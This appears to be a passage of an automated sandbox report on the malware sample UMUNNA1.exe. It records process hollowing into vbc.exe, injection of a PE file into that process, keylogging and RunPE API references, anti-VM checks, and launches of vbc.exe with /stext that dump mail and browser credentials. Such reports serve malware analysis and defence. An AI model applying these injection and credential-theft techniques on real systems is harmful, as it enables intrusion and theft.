Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

6_2_00408836

Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe

Window / User API: threadDelayed 509

Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe TID: 6972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe TID: 6204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe TID: 5896	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe TID: 2192	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe TID: 2224	Thread sleep time: -101800s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe TID: 6684	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,	5_2_00406EC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,	6_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,	6_2_00407E0E

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_004161B0 memset,GetSystemInfo,

6_2_004161B0

Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 140000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: UMUNNA1.exe, 00000004.00000002.926040527.0000000006F80000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: UMUNNA1.exe, 00000004.00000002.926040527.0000000006F80000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: UMUNNA1.exe, 00000004.00000002.926040527.0000000006F80000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: UMUNNA1.exe, 00000000.00000002.670132115.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: vmware svga ii3vm additions s3 trio32/64
Source: UMUNNA1.exe, 00000004.00000002.926040527.0000000006F80000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\UMUNNA1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

6_2_00408836

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 5_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,

5_2_00403C3D

Source: C:\Users\user\Desktop\UMUNNA1.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 4.2.UMUNNA1.exe.830000.1.unpack, Form1.cs	Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 4.2.UMUNNA1.exe.830000.1.unpack, RunPE.cs	Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Users\user\Desktop\UMUNNA1.exe base: 830000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\UMUNNA1.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000			Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000	Jump to behavior

Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Users\user\Desktop\UMUNNA1.exe C:\Users\user\Desktop\UMUNNA1.exe	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'	Jump to behavior

Source: UMUNNA1.exe, 00000004.00000002.921141633.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: UMUNNA1.exe, 00000004.00000002.921141633.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: UMUNNA1.exe, 00000004.00000002.921141633.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: UMUNNA1.exe, 00000004.00000002.921141633.0000000001220000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
